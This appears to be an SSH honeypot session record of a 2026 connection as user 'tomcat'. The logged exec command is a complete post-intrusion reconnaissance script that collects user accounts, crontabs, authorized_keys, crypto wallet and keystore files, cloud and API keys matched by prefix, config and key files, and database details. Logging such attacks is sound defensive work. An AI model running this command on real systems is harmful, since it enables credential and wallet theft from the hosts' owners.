| IP | 159.203.66.5 |
| Country | US |
| Username | tomcat |
| Shell | tetris |
| Exec Command | bash -c 'exec > /tmp/ssh_test_result.txt 2>&1; echo connected; hostname; whoami; id; uname -a; ps waux; echo ---USERS---; cat /etc/passwd; echo ---CRON---; crontab -l 2>/dev/null; for u in $(cut -d: -f1 /etc/passwd); do crontab -l -u $u 2>/dev/null; done; echo ---DISK---; df -h; echo ---MEMORY---; free -h; echo ---PORTS---; ss -tlnp; echo ---SERVICES---; systemctl list-units --type=service --state=running --no-pager; echo ---ENV---; for u in $(cut -d: -f1 /etc/passwd); do for f in /home/$u/.bashrc /home/$u/.profile /home/$u/.ssh/authorized_keys; do [ -f $f ] && echo "=== $u $f ===" && cat $f; done; done; echo ---Docker---; docker ps -a 2>/dev/null; docker images 2>/dev/null; echo ---CRYPTO---; find /home -name "*wallet*" -o -name "*keystore*" -o -name "*.dat" -o -name "*mnemonic*" -o -name "*.json" 2>/dev/null | head -100; echo ---API---; grep -r "AKIA\|ghp_\|xoxb\|sk-\|AIza\|sk_live_\|sk_test_\|00-\|gkv_" /etc /home 2>/dev/null | head -200; echo ---SECRETS---; find /home -type f \( -name "*.env" -o -name "*.conf" -o -name "*.yml" -o -name "*.yaml" -o -name "*.json" -o -name "*.toml" -o -name "*.ini" -o -name "*.cfg" -o -name "*.key" -o -name "*.pem" \) -not -name "*.pub" -not -name "id_rsa.pub" 2>/dev/null | head -200; echo ---DOMAINS---; find /etc/nginx /etc/apache2 /etc/lighttpd /etc/opensips /etc/freeswitch /usr/local/etc -name "*.conf" -o -name "*.conf.d" 2>/dev/null | head -100; echo ---MYSQL---; mysql --version 2>/dev/null; mysql -e "SHOW DATABASES" 2>/dev/null; echo ---PGSQL---; psql --version 2>/dev/null; echo ---REDIS---; redis-cli ping 2>/dev/null; echo ---DONE---' |
| Score | - |
| Connected | 2026-06-16 16:50:52 UTC |
| Disconnected | 2026-06-16 16:50:52 UTC |
Session 557e82a4-6661-480c-a07f-e4afcb41b88a
No recorded events for this session.